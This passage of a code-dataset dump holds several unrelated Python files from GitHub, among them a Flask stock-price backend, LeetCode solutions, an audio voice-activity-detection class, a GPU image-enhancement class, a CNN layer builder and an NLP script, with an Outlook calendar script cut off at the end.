content = theDB.get_search_history(ticker)\n if not content:\n url = 'https://www.alphavantage.co/query?function=TIME_SERIES_DAILY&symbol='+ticker+'&apikey='+API_KEY\n api_call = requests.get(url)\n data = api_call.json()\n\n #Data is not recorded for the weekends so careful not to break the site\n\n days = list(data[\"Time Series (Daily)\"])\n current_data = data[\"Time Series (Daily)\"][days[0]]\n\n title = theDB.get_co_name(ticker)\n last_search = {ticker: {title: {\"Open\": current_data[\"1. open\"], \n \"High\": current_data[\"2. high\"],\n \"Low\": current_data[\"3. low\"],\n \"Close\": current_data[\"4. close\"],\n \"Volume\": current_data[\"5. volume\"]}}}\n daily_values = []\n ticker_node = {}\n\n #Gets last seven days of data for given stock. \n for i in range(0,7):\n current_data = data[\"Time Series (Daily)\"][days[i]]\n ticker_node[days[i]]= {\"Open\": current_data[\"1. open\"],\n \"High\": current_data[\"2. high\"],\n \"Low\": current_data[\"3. low\"],\n \"Close\": current_data[\"4. close\"],\n \"Volume\": current_data[\"5. volume\"]\n }\n last_search = {ticker: {title: ticker_node}}\n print(\"Printing daily values:\")\n theDB.write_search_history(last_search)\n content = theDB.get_search_history(ticker)\n\n graph_values = theDB.get_graph_data(content)\n print(json.dumps(graph_values, indent=4))\n return flask.Response(response=json.dumps(graph_values,indent=4),status=200)\n\n\nif __name__ == \"__main__\":\n StocksFirst.run(\"localhost\", 6969) ","repo_name":"Tristochi/StocksFirst","sub_path":"backend/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44268540242","text":"# 二叉搜索树与双向链表。这个题目是一个双向链表的问题。关键就在于递归的想法,对于当前root来说,对左子树进行递归,得到左子树排好\n# 链表的头结点和尾结点Lh,Lt。然后对右子树进行递归,得到右子树排好链表的头结点和尾结点Rh,Rt。那么root.left = Lt, root.right = Rh\n# 但是这里需要注意边界条件,如果左子树为空,那么就让root变为Lh, 如果右子树为空,那么就让root变为Rt。 如果同时变成了空,就返回None,\n# None 即可。\n\"\"\"\n# Definition for a Node.\nclass Node(object):\n def __init__(self, val, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\"\"\"\nclass Solution(object):\n def treeToDoublyList(self, root):\n \"\"\"\n :type root: Node\n :rtype: Node\n \"\"\"\n if not root:\n return\n Lh,Rt = self.func(root)\n Lh.left = Rt\n Rt.right = Lh\n return Lh\n\n def func(self,root):\n if not root:\n return None,None\n Lh,Lt = self.func(root.left)\n Rh,Rt = self.func(root.right)\n root.left = Lt\n if Lt:\n Lt.right = root\n else:\n Lh = root\n root.right = Rh\n if Rh: \n Rh.left = root\n else:\n Rt = root\n return Lh,Rt","repo_name":"whywhs/Leetcode","sub_path":"meet36_M.py","file_name":"meet36_M.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30416638166","text":"import os\nimport os\nimport time\nfrom pprint import pprint\n\nimport numpy as np\nimport torch\nfrom IPython.display import Audio\nfrom pydub import AudioSegment\nfrom web.database.sqlite_util import saveVoiceRecord\nfrom flask import send_file\nimport soundfile as sf\n# from main import SAMPLING_RATE\nimport noisereduce as nr\n# from noisereduce.utils import get_noise\n# @app.route('/upload', methods=['GET', 'POST'])\n# def upload_file():\n# # 渲染文件\n# return render_template('upload.html')\nfrom pydub.silence import split_on_silence\n# 文件保存的目录,根据实际情况的文件结构做调整;\n# 若不指定目录,可以写成f.save(f.filename),可以默认保存到当前文件夹下的根目录\n# 设置上传文件保存路径 可以是指定绝对路径,也可以是相对路径(测试过)\n# 将地址赋值给变量\nfrom .utils_vad import init_jit_model,get_speech_timestamps,save_audio,read_audio,collect_chunks\nclass VadModel():\n\n def __init__(self):\n self.cur_path = os.path.dirname(os.path.realpath(__file__))\n self.upload_folder = os.path.join(os.getcwd(),\"web/static/upload\")\n self.output_folder = os.path.join(os.getcwd(),\"web/static/output\")\n self.SAMPLING_RATE = 16000\n self.use_onnx = False\n #初始化model和工具类\n #TODO 应该是一个单线程的处理,看看这个model是否支持多线程操作\n self.model = init_jit_model(os.path.join(os.path.dirname(os.path.realpath(__file__)),'files/silero_vad.jit'))\n\n def fotmat2Wav(self,output_folder, voice_list):\n # TODO 正则匹配下文件名是否是以wav为后缀的,不是的话,转换成wav\n # 创建input和output文件夹\n # ouput_folder = os.path.join(source_folder, \"output\")\n # 截取文件名\n wav_list = []\n if not os.path.exists(output_folder):\n print(\"output文件夹不存在\")\n os.mkdir(output_folder)\n # 判断文件是否是mp3或者是m4a,然后转换成wav\n for item in voice_list:\n wav_name = item.split(\"\\\\\")[-1].split(\".\")[0]\n print(item)\n print(wav_name)\n sound = AudioSegment.from_file(item)\n sound_len = sound.duration_seconds\n sound.export(\"%s.wav\" % (wav_name), format=\"wav\")\n wav_list.append(\"%s.wav\" % (wav_name))\n return wav_list,sound_len\n\n def split_audio_by_energy(audio, min_silence_len=1000, silence_thresh=-50, energy_thresh=200):\n samples = np.array(audio.get_array_of_samples())\n samples = samples.astype(np.float32) / np.iinfo(samples.dtype).max\n samples = np.abs(samples)\n energy = np.convolve(samples, np.ones(min_silence_len), mode='valid')\n silence_mask = energy < energy_thresh\n split_points = np.where(np.diff(silence_mask.astype(np.int)) == 1)[0] + min_silence_len // 2\n split_points = np.concatenate(([0], split_points, [len(samples)]))\n audio_chunks = [audio[start:end] for start, end in zip(split_points[:-1], split_points[1:])]\n return audio_chunks\n\n def denoise(self,wav_file_path):\n print(\"开始去除背景的噪音...\")\n print(wav_file_path)\n #加载噪音样本,让模型去掉目标文件里面类似的噪音\n noise_data, sample_rate = sf.read(os.path.join(self.cur_path,'noise.wav'))\n noise_data = noise_data.astype('float32')\n audio = AudioSegment.from_file(wav_file_path, format='wav')\n #转换成单声道\n # audio = audio.set_channels(1)\n # audio_chunks = split_on_silence(\n # audio,\n # min_silence_len=500, # 最小静默长度\n # silence_thresh=-50, # 静默判定阈值\n # keep_silence=500 # 拆分后保留的静默长度\n # )\n audio_chunks = audio[::2000]\n for i, chunk in enumerate(audio_chunks):\n # 应用噪音消除算法\n # chunk_array = chunk.get_array_of_samples()\n chunk_array = nr.reduce_noise(audio_clip=chunk, noise_clip=noise_data, verbose=False)\n chunk = chunk._spawn(chunk_array)\n # 保存音频片段\n chunk.export(f\"audio_chunk_{i}.wav\", format=\"wav\")\n #分片\n # output_audio = audio_chunks[0]\n # for i in range(1, len(audio_chunks)):\n # output_audio += audio_chunks[i]\n # output_audio.export('output_result.wav', format='wav')\n # noise_clip = noise_data[0:sample_rate]\n # noise_profile = get_noise(noise_clip,sample_rate)\n #TODO 单语音文件太大了,需要把分片处理后再合成一整个完整的语音\n\n # data,sample_rate = sf.read(wav_file_path)\n # reduced_noise = reduce_noise(audio_clip=data, noise_clip=noise_data[0:sample_rate], verbose=False)\n # sf.write(wav_file_path,reduced_noise,sample_rate)\n print(\"噪音去除完成...\")\n\n #开始对指定语音文件进行分析抽取\n def start(self,filepath):\n print(\"转换语音格式中....\")\n source_path = os.path.join(self.upload_folder, \"%s\" % filepath)\n #源文件需要转化成wav格式\n source_file_stats = os.stat(source_path)\n print(\"将要识���的源文件%s :%d byte\"%(source_path,source_file_stats.st_size))\n #TODO 暂时是只识别一个,后面可以是一整个列表\n voice_list = []\n voice_list.append(source_path)\n wav_list,sound_len = self.fotmat2Wav(self.output_folder,voice_list)\n print(\"文件的时长:%d\",sound_len)\n print(wav_list)\n print(\"格式转换完毕.\")\n start_time = time.time()\n for wav_file in wav_list:\n # TODO 需要一个取出杂音的步骤\n wav_stats = os.stat(wav_file)\n print(\"wav file size = %d\"%wav_stats.st_size)\n wav = read_audio('%s' % wav_file, sampling_rate=self.SAMPLING_RATE)\n # get speech timestamps from full audio file\n st = get_speech_timestamps(wav, self.model, sampling_rate=self.SAMPLING_RATE, threshold=0.8)\n pprint(st)\n voice_section = []\n for i in range(len(st) - 1, -1, -1):\n #把太局促的声音片段给切掉,一般都是杂声,一半说话的都是连续的\n if(st[i]['end']-st[i]['start']<10000):\n st.pop(i)\n continue\n voice_section.append([st[i]['start']/self.SAMPLING_RATE/sound_len,st[i]['end']/self.SAMPLING_RATE/sound_len])\n print(\"开始-结束-总帧数:%d - %d - %d\"%(st[i]['start'],st[i]['end'],st[i]['end']-st[i]['start']))\n\n #因为采样率是16000,所以1s对应的时间戳就是16000,2s的位置就是32000,以此类推,换算出所有片段对应的占整个音频的百分比数值\n print(\"片段中有人声的部分区间的百分比:\")\n #存到数据库里面\n print(voice_section)\n print(\"保存合成录音\")\n target_path = os.path.join(self.output_folder, \"%s\" % wav_file)\n print(\"target_path = %s\" % target_path)\n fuck = collect_chunks(st, wav)\n save_audio(target_path, fuck, sampling_rate=self.SAMPLING_RATE)\n print(\"获取到人声在语音的位置\")\n Audio(target_path)\n print(\"转换语音成功:%s 耗时:%d s\" % (target_path, time.time() - start_time))\n #把生成的数据添加到数据库中\n saveVoiceRecord(filepath,sound_len,voice_section)\n # stream流下载到浏览器\n send_file(target_path, as_attachment=True)\n start_time = time.time()\n\n","repo_name":"mutengchen/jr_vad","sub_path":"vad/VadModel.py","file_name":"VadModel.py","file_ext":"py","file_size_in_byte":7703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74583662866","text":"import cv2\nimport numpy as np\nimport torch\nfrom kornia.color import hsv_to_rgb, rgb_to_hsv\nfrom torch.fft import fft2, fftshift, ifft2\nfrom torchvision.io import read_image\nfrom torchvision.transforms.functional import resize, rgb_to_grayscale\n\nfrom .utils import cart2pol_torch\n\n\nclass VEVID_GPU:\n def __init__(self, device, h=None, w=None):\n \"\"\"initialize the VEVID GPU version class\n\n Args:\n device (torch.device)\n h (int, optional): height of the image to be processed. Defaults to None.\n w (int, optional): width of the image to be processed. Defaults to None.\n \"\"\"\n self.h = h\n self.w = w\n self.device = device\n\n def load_img(self, img_file=None, img_array=None):\n \"\"\"load the image from an ndarray or from an image file\n\n Args:\n img_file (str, optional): path to the image. Defaults to None.\n img_array (torch.Tensor, optional): image in the form of torch.Tensor. Defaults to None.\n \"\"\"\n if img_array is not None:\n # directly load the image from the array instead of the file\n if img_array.get_device() == self.device:\n self.img_rgb = img_array\n else:\n self.img_rgb = img_array.to(self.device)\n if not self.h and not self.w:\n self.h = self.img_rgb.shape[-2]\n self.w = self.img_rgb.shape[-1]\n # convert from RGB to HSV\n self.img_hsv = rgb_to_hsv(self.img_rgb)\n\n else:\n # load the image from the image file\n # torchvision read_image currently only supports 'jpg' and 'png'\n # use opencv to read other image formats\n if img_file.split(\".\")[-1] in [\"jpg\", \"png\", \"jpeg\"]:\n self.img_rgb = read_image(img_file).to(self.device)\n else:\n self.img_bgr = cv2.imread(img_file)\n self.img_rgb = cv2.cvtColor(self.img_bgr, cv2.COLOR_BGR2RGB)\n self.img_rgb = torch.from_numpy(\n np.transpose(self.img_rgb, (2, 0, 1))\n ).to(self.device)\n if not self.h and not self.w:\n self.h = self.img_rgb.shape[-2]\n self.w = self.img_rgb.shape[-1]\n else:\n self.img_rgb = resize(self.img_rgb, [self.h, self.w])\n # convert from RGB to HSV\n # rgb_to_hsv in kornia requires the input RGB image to be in the range of 0-1\n self.img_hsv = rgb_to_hsv((self.img_rgb.float()) / 255.0)\n\n def init_kernel(self, S, T):\n \"\"\"initialize the phase kernel of VEViD\n\n Args:\n S (float): phase strength\n T (float): variance of the spectral phase function\n \"\"\"\n # create the frequency grid\n u = torch.linspace(-0.5, 0.5, self.h, device=self.device).float()\n v = torch.linspace(-0.5, 0.5, self.w, device=self.device).float()\n [U, V] = torch.meshgrid(u, v, indexing=\"ij\")\n # construct the kernel\n [self.THETA, self.RHO] = cart2pol_torch(U, V)\n self.vevid_kernel = torch.exp(-self.RHO**2 / T)\n self.vevid_kernel = (self.vevid_kernel / torch.max(abs(self.vevid_kernel))) * S\n\n def apply_kernel(self, b, G, color=False, lite=False):\n \"\"\"apply the phase kernel onto the image\n\n Args:\n b (float): regularization term\n G (float): phase activation gain\n color (bool, optional): whether to run color enhancement. Defaults to False.\n lite (bool, optional): whether to run VEViD lite. Defaults to False.\n \"\"\"\n if color:\n channel_idx = 1\n else:\n channel_idx = 2\n vevid_input = self.img_hsv[channel_idx, :, :]\n if lite:\n vevid_phase = torch.atan2(-G * (vevid_input + b), vevid_input)\n else:\n vevid_input_f = fft2(vevid_input + b)\n img_vevid = ifft2(\n vevid_input_f * fftshift(torch.exp(-1j * self.vevid_kernel))\n )\n vevid_phase = torch.atan2(G * torch.imag(img_vevid), vevid_input)\n vevid_phase_norm = (vevid_phase - vevid_phase.min()) / (\n vevid_phase.max() - vevid_phase.min()\n )\n self.img_hsv[channel_idx, :, :] = vevid_phase_norm\n self.vevid_output = hsv_to_rgb(self.img_hsv)\n\n def run(self, img_file, S, T, b, G, color=False):\n \"\"\"run the full VEViD algorithm\n\n Args:\n img_file (str): path to the image\n S (float): phase strength\n T (float): variance of the spectral phase function\n b (float): regularization term\n G (float): phase activation gain\n color (bool, optional): whether to run color enhancement. Defaults to False.\n\n Returns:\n torch.Tensor: enhanced image\n \"\"\"\n self.load_img(img_file=img_file)\n self.init_kernel(S, T)\n self.apply_kernel(b, G, color, lite=False)\n\n return self.vevid_output\n\n def run_lite(self, img_file, b, G, color=False):\n \"\"\"run the VEViD lite algorithm\n\n Args:\n img_file (str): path to the image\n b (float): regularization term\n G (float): phase activation gain\n color (bool, optional): whether to run color enhancement. Defaults to False.\n\n Returns:\n torch.Tensor: enhanced image\n \"\"\"\n self.load_img(img_file=img_file)\n self.apply_kernel(b, G, color, lite=True)\n\n return self.vevid_output\n","repo_name":"JalaliLabUCLA/phycv","sub_path":"phycv/vevid_gpu.py","file_name":"vevid_gpu.py","file_ext":"py","file_size_in_byte":5558,"program_lang":"python","lang":"en","doc_type":"code","stars":457,"dataset":"github-code","pt":"48"} +{"seq_id":"3139387181","text":"# https://leetcode.cn/problems/largest-magic-square/\n# 1895. 最大的幻方\nclass Solution:\n def largestMagicSquare(self, grid: List[List[int]]) -> int:\n n = len(grid)\n m = len(grid[0])\n g = [[0] * (m+1) for i in range(n+1)]\n \n for i, row in enumerate(grid):\n for j, x in enumerate(row):\n g[i+1][j+1] = x + g[i+1][j] + g[i][j+1] - g[i][j]\n \n # for row in g:\n # print(row)\n \n def is_magic(i, j, k):\n # print(f'is_magic({i}, {j}, {k})')\n s = g[i+k][j+k] - g[i][j+k] - g[i+k][j] + g[i][j]\n # print(f's = {s}')\n if s % k > 0:\n return False\n r = s // k\n # print(f'r = {r}')\n for ii in range(i, i+k):\n si = g[ii+1][j+k] - g[ii][j+k] - g[ii+1][j] + g[ii][j]\n # print(ii, si)\n if si != r:\n return False\n for jj in range(j, j+k):\n sj = g[i+k][jj+1] - g[i][jj+1] - g[i+k][jj] + g[i][jj]\n # print(jj, sj)\n if sj != r:\n return False\n s1 = 0\n s2 = 0\n for ii in range(k):\n s1 += grid[i+ii][j+ii]\n s2 += grid[i+k-1-ii][j+ii]\n if s1 != r or s2 != r:\n return False\n return True\n \n for k in range(min(n, m), 0, -1):\n for i in range(n+1-k):\n for j in range(m+1-k):\n if is_magic(i, j, k):\n return k\n return 1\n \n","repo_name":"fish-ball/leetcode","sub_path":"algorithms/leet.1895.src.1.py","file_name":"leet.1895.src.1.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73874773264","text":"from src.data.constants import LayerType\nfrom src.model.activations import ReLUActivation, NonActivation\nfrom src.model.layers import ConvLayer, PoolLayer, FlattenLayer, np, HiddenLayer, TestingLayer\n\nfrom src.utils.processing import parseJSON\n\nACTIVATIONS_MAP = {'RELU': ReLUActivation(), \"NON\": NonActivation()}\n\n\nclass LayersBuilder(object):\n def __init__(self):\n self.__layersConfig = []\n\n def addLayer(self, config):\n self.__layersConfig.append(config)\n\n def build(self, hyperParams, inputDimensions, fullyConnectedN, outputClasesN):\n totalDepth = 1\n poolingN = 0\n hiddenN = 0\n hiddenLayerPresent = False\n firstConv = True\n for config in self.__layersConfig:\n if config[0] == LayerType.CONV:\n totalDepth = config[1].filter_number\n if config[0] == LayerType.POOLING:\n poolingN += 1\n if config[0] == LayerType.HIDDEN:\n hiddenN += 1\n inputShrink = np.power(2, poolingN)\n fHiddenInput = int(inputDimensions[0] * inputDimensions[1] / np.power(inputShrink, 2) * totalDepth)\n layers = []\n convDepth = 1\n for config in self.__layersConfig:\n if config[0] == LayerType.CONV:\n if (firstConv):\n layers.append((ConvLayer(params=config[1], hyperParams=hyperParams,\n activation=ACTIVATIONS_MAP[config[1].activation]),\n LayerType.CONV))\n firstConv = False\n else:\n\n layers.append((ConvLayer(params=config[1], hyperParams=hyperParams,\n activation=ACTIVATIONS_MAP[config[1].activation], inputDepth=convDepth),\n LayerType.CONV))\n convDepth = config[1].filter_number\n\n elif config[0] == LayerType.POOLING:\n layers.append((PoolLayer(), LayerType.POOLING))\n elif config[0] == LayerType.FLAT:\n layers.append((FlattenLayer(), LayerType.FLAT))\n elif config[0] == LayerType.HIDDEN:\n if not hiddenLayerPresent and hiddenN != 1:\n layers.append((HiddenLayer(fHiddenInput,\n fullyConnectedN, ACTIVATIONS_MAP[config[1].activation], hyperParams),\n LayerType.HIDDEN))\n hiddenLayerPresent = True\n elif not hiddenLayerPresent and hiddenN == 1:\n layers.append((HiddenLayer(fHiddenInput,\n outputClasesN, ACTIVATIONS_MAP[config[1].activation], hyperParams),\n LayerType.HIDDEN))\n hiddenLayerPresent = True\n elif hiddenN > 1:\n layers.append((HiddenLayer(fullyConnectedN, fullyConnectedN, ACTIVATIONS_MAP[config[1].activation],\n hyperParams),\n LayerType.HIDDEN))\n else:\n layers.append((HiddenLayer(fullyConnectedN, outputClasesN, ACTIVATIONS_MAP[config[1].activation],\n hyperParams),\n LayerType.HIDDEN))\n hiddenN -= 1\n elif config[0] == LayerType.TEST:\n layers.append((TestingLayer(fHiddenInput, outputClasesN), LayerType.TEST))\n return layers\n\n def reconstruct(self, modelJson):\n layers = []\n data = parseJSON(modelJson)\n for layer in data.model.layers:\n print(layer, '\\n')\n if (layer.type == 'CONV'):\n if (layer.activation == 'RELU'):\n activation = ReLUActivation()\n else:\n activation = NonActivation()\n layers.append((ConvLayer(activation=activation, filters=layer.weights, stride=layer.convParams.stride),\n LayerType.CONV))\n elif (layer.type == 'POOLING'):\n layers.append((PoolLayer(), LayerType.POOLING))\n elif (layer.type == 'FLAT'):\n layers.append((FlattenLayer(), LayerType.FLAT))\n elif (layer.type == 'HIDDEN'):\n layers.append((HiddenLayer(weights=layer.weights, biases=layer.biases), LayerType.FLAT))\n sampleData = np.asarray(data.model.sample.data)\n sampleRaw = np.asarray(data.model.sample.result)\n sampleProbabilities = np.asarray(data.model.sample.probabilities)\n return layers, (sampleData, sampleRaw, sampleProbabilities)\n","repo_name":"alexbajzat/Musical-Notes-Recognition-CNN","sub_path":"src/model/layers_builder.py","file_name":"layers_builder.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"73697673744","text":"from nltk.corpus import wordnet as wn \t\t# For finding the categories of nouns and verbs \r\nfrom textblob import TextBlob \t\t\t# For pos tagging to find nouns and verbs from the data\r\nimport matplotlib.pyplot as plt \t\t# For plotting frequency histograms\r\nimport spacy\t\t\t\t\t# For entity recognition and relationship\r\n\r\n# Opening book - 1 and reading its data in 'T1'\r\nf1 = open('book1023.txt', 'r', encoding = 'utf-8')\r\nT1 = f1.read()\r\n# Opening book - 2 and reading its data in 'T2'\r\nf2 = open('book2600.txt', 'r', encoding = 'utf-8')\r\nT2 = f2.read()\r\n# Converting the data in 't1' and 't2' to lower-case\r\nt1 = T1.lower()\r\nt2 = T2.lower()\r\n\r\n# Identifying nouns and verbs from present in 't1', i.e., Book-1\r\nnoun1 = [w for (w, pos) in TextBlob(t1).pos_tags if pos[0] == 'N']\r\nverb1 = [w for (w, pos) in TextBlob(t1).pos_tags if pos[0] == 'V']\r\n# Identifying nouns and verbs from present in 't2', i.e., Book-2\r\nnoun2 = [w for (w, pos) in TextBlob(t2).pos_tags if pos[0] == 'N']\r\nverb2 = [w for (w, pos) in TextBlob(t2).pos_tags if pos[0] == 'V']\r\n\r\n# Creating an empty list that will contain the category of the noun for each word present in the list 'noun1' \r\nnoun_wordnet1 = []\r\n# Finding the category of noun for each word present in the list 'noun1' and appending it in the list 'noun_wordnet1'\r\nfor x in range(len(noun1)):\r\n\tcol = []\r\n\tfor synset in wn.synsets(noun1[x]):\r\n\t\tcol.append(synset.lexname())\r\n\tif len(col) != 0:\r\n\t\tnoun_wordnet1.append(col[0])\r\n\telse:\r\n\t\tnoun_wordnet1.append(\"noun.person\")\r\n\r\n# Creating an empty list that will contain the category of the verb for each word present in the list 'verb1' \r\nverb_wordnet1 = []\r\n# Finding the category of verb for each word present in the list 'verb1' and appending it in the list 'verb_wordnet1'\r\nfor x in range(len(verb1)):\r\n\tcol = []\r\n\tfor synset in wn.synsets(verb1[x]):\r\n\t\tcol.append(synset.lexname())\r\n\tif len(col) != 0:\r\n\t\tverb_wordnet1.append(col[0])\r\n\telse:\r\n\t\tverb_wordnet1.append(\"verb.stative\")\r\n\r\n# Creating an empty list that will contain the category of the noun for each word present in the list 'noun2' \r\nnoun_wordnet2 = []\r\n# Finding the category of noun for each word present in the list 'noun2' and appending it in the list 'noun_wordnet2'\r\nfor x in range(len(noun2)):\r\n\tcol = []\r\n\tfor synset in wn.synsets(noun2[x]):\r\n\t\tcol.append(synset.lexname())\r\n\tif len(col) != 0:\r\n\t\tnoun_wordnet2.append(col[0])\r\n\telse:\r\n\t\tnoun_wordnet2.append(\"noun.person\")\r\n\r\n# Creating an empty list that will contain the category of the verb for each word present in the list 'verb2' \r\nverb_wordnet2 = []\r\n# Finding the category of verb for each word present in the list 'verb2' and appending it in the list 'verb_wordnet2'\r\nfor x in range(len(verb2)):\r\n\tcol = []\r\n\tfor synset in wn.synsets(verb2[x]):\r\n\t\tcol.append(synset.lexname())\r\n\tif len(col) != 0:\r\n\t\tverb_wordnet2.append(col[0])\r\n\telse:\r\n\t\tverb_wordnet2.append(\"verb.stative\")\r\n\r\n# Function for counting the frequency of a various categories of verb and noun\r\ndef count_elements(seq) -> dict:\r\n hist = {}\r\n for i in seq:\r\n hist[i] = hist.get(i, 0) + 1\r\n return hist\r\n\r\n# Histogram for categories of noun present in list 'noun1'\r\ncounted_noun1 = count_elements(noun_wordnet1)\r\nplt.bar(counted_noun1.keys(), counted_noun1.values(), 0.7, color = 'g')\r\nplt.xlabel(\"Categories of noun\")\r\nplt.xticks(rotation = 90)\r\nplt.ylabel(\"Frequency for book-1\")\r\nplt.show()\r\nprint(\"Total number of categories of noun:\", len(counted_noun1))\r\nprint(\"Count for different noun categories in book-1:\\n\", counted_noun1, \"\\n\")\r\n\r\n# Histogram for categories of verb present in list 'verb1'\r\ncounted_verb1 = count_elements(verb_wordnet1)\r\nplt.bar(counted_verb1.keys(), counted_verb1.values(), 0.7, color = 'g')\r\nplt.xlabel(\"Categories of verb\")\r\nplt.xticks(rotation = 90)\r\nplt.ylabel(\"Frequency for book-1\")\r\nplt.show()\r\nprint(\"Total number of categories of verb:\", len(counted_verb1))\r\nprint(\"Count for different verb categories in book-1:\\n\", counted_verb1, \"\\n\")\r\n\r\n# Histogram for categories of noun present in list 'noun2'\r\ncounted_noun2 = count_elements(noun_wordnet2)\r\nplt.bar(counted_noun2.keys(), counted_noun2.values(), 0.7, color = 'g')\r\nplt.xlabel(\"Categories of noun\")\r\nplt.xticks(rotation = 90)\r\nplt.ylabel(\"Frequency for book-2\")\r\nplt.show()\r\nprint(\"Total number of categories of noun:\", len(counted_noun2))\r\nprint(\"Count for different noun categories in book-2:\\n\", counted_noun2, \"\\n\")\r\n\r\n# Histogram for categories of verb present in list 'verb2'\r\ncounted_verb2 = count_elements(verb_wordnet2)\r\nplt.bar(counted_verb2.keys(), counted_verb2.values(), 0.7, color = 'g')\r\nplt.xlabel(\"Categories of verb\")\r\nplt.xticks(rotation = 90)\r\nplt.ylabel(\"Frequency for book-2\")\r\nplt.show()\r\nprint(\"Total number of categories of verb:\", len(counted_verb2))\r\nprint(\"Count for different verb categories in book-2:\\n\", counted_verb2, \"\\n\")\r\n\r\n\r\n\r\n# Loading the trainer for entity recognition and relationship\r\nsp = spacy.load('en_core_web_sm')\r\n\r\n# Splitting the data 'T1' paragraph-wise for entity recognition and putting the splitted data in the list 'data1'\r\ndata1 = T1.split(\"\\n\\n\")\r\nlg1 = len(data1)\r\n# Iterating over every paragraph present in the list 'data1' for entity recognition\r\nprint(\"\\t\\t\\t\\t\\tEntity recognition for BOOK-1:\")\r\nfor i in range(lg1):\r\n\tdoc = sp(data1[i])\r\n\tprint(\"\\n\\tParagraph No. -\", i+1)\r\n\tfor ent in doc.ents:\r\n\t\tprint(ent.text + ' - ' + ent.label_)\r\n\r\n# Splitting the data 'T2' paragraph-wise for entity recognition and putting the splitted data in the list 'data2'\r\ndata2 = T2.split(\"\\n\\n\")\r\nlg2 = len(data2)\r\n# Iterating over every paragraph present in the list 'data2' for entity recognition\r\nprint(\"\\n\\t\\t\\t\\t\\tEntity recognition for BOOK-2:\")\r\nfor i in range(lg2):\r\n\tdoc = sp(data2[i])\r\n\tprint(\"\\n\\tParagraph No. -\", i+1)\r\n\tfor ent in doc.ents:\r\n\t\tprint(ent.text + ' - ' + ent.label_)\r\n\r\n# Recognizing relationships among various entities present in book-1 sentence-wise for each paragraph using 'data1'\r\nprint(\"\\n\\t\\t\\t\\t\\tEntity Relationship for BOOK-1:\")\r\nfor i in range(lg1):\r\n\tdt1 = data1[i].split('.')\t\t\t\t\t\t\t\t\t\t\t\t# Splitting the paragraph present in 'data1' to create a list(dt1) of sentences for entity relationships\r\n\tfor j in range(len(dt1)):\r\n\t\tpiano_doc = sp(dt1[j])\r\n\t\tprint(\"\\n\\tParagraph No. -\", i+1, \", sentence no. -\", j+1)\r\n\t\tfor token in piano_doc:\r\n\t\t\tprint (token.text, token.tag_, token.head.text, token.dep_)\t\t\t\t\t\t# Finding and printing relationship among entities present in a sentence\r\n\r\n# Recognizing relationships among various entities present in book-2 sentence-wise for each paragraph using 'data2'\r\nprint(\"\\n\\t\\t\\t\\t\\tEntity Relationship for BOOK-2:\")\r\nfor i in range(lg2):\r\n\tdt2 = data2[i].split('.')\t\t\t\t\t\t\t\t\t\t\t\t# Splitting the paragraph present in 'data2' to create a list(dt2) of sentences for entity relationships\r\n\tfor j in range(len(dt2)):\r\n\t\tpiano_doc = sp(dt2[j])\r\n\t\tprint(\"\\n\\tParagraph No. -\", i+1, \", sentence no. -\", j+1)\r\n\t\tfor token in piano_doc:\r\n\t\t\tprint (token.text, token.tag_, token.head.text, token.dep_)\t\t\t\t\t\t# Finding and printing relationship among entities present in a sentence\r\n","repo_name":"Apoorv023/Natural-Language-Processing","sub_path":"Project Round - 2/nlpcode.py","file_name":"nlpcode.py","file_ext":"py","file_size_in_byte":7076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15214329057","text":"#exec(open('kineticfunc.py').read())\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef kineticfunc1(Gbar, minfV, mtauV, hinfV, htauV, minfm80, hinfm80):\n #Assuming that at time=0, the channel is at steady state at -80mV.\n\n dt = 0.00001\n tlist = np.arange(0,0.5,dt)\n mlist = [minfm80 + dt*(minfV-minfm80)/mtauV]\n hlist = [hinfm80 + dt*(hinfV-hinfm80)/htauV]\n for t in tlist[1:]:\n mlist.append(mlist[-1]+dt*(minfV-mlist[-1])/mtauV)\n hlist.append(hlist[-1]+dt*(hinfV-hlist[-1])/htauV)\n G = Gbar*np.array(mlist)**1*np.array(hlist)\n return G\n\nat0 = kineticfunc1(1, 0.5,0.005, 0.5,0.050, 0,1)\nplt.figure(1)\nplt.plot(at0)\n\ndef kineticfunc2(t, Gbar, minfV, mtauV, hinfV, htauV, min, hin):\n #Assuming that at time=0, the channel is at steady state at -80mV.\n m = minfV + (min-minfV)*np.exp(-t/mtauV)\n h = hinfV + (hin-hinfV)*np.exp(-t/htauV)\n return Gbar*m*h\n\nat0 = [kineticfunc2(t, 1, 0.5,0.005, 0.5,0.050, 0,1) for t in np.arange(0,0.5,1e-5)]\nplt.figure(2)\nplt.plot(at0)\nplt.show()\n","repo_name":"analkumar2/Thesis-work","sub_path":"2019-11-12-kineticfeatures/kineticfunc.py","file_name":"kineticfunc.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19054543615","text":"import sys\r\nimport win32com.client\r\nfrom win32com.client import constants as c\r\nfrom ics import Calendar, Event\r\nimport chardet\r\n\r\nfrom dateutil import tz\r\nfrom dateutil.parser import parse\r\n\r\n\r\nclass MyOutlookCalendar(object):\r\n def __init__(self):\r\n self.outlook = win32com.client.Dispatch(\"Outlook.Application\")\r\n self.nsoutlook = self.outlook.GetNamespace(\"MAPI\")\r\n self.defaultCalendar = 9\r\n self.verbose = False\r\n\r\n # cal = ns.GetDefaultFolder(win32com.client.constants.olFolderCalendar)\r\n # inbox = mapi.GetDefaultFolder(win32com.client.constants.olFolderInbox)\r\n # \"6\" refers to the index of a folder - in this case, the inbox.\r\n # \"9\" is calendar\r\n '''\r\n how to reach any default folder not just \"Inbox\" here's the list:\r\n 3 Deleted Items\r\n 4 Outbox\r\n 5 Sent Items\r\n 6 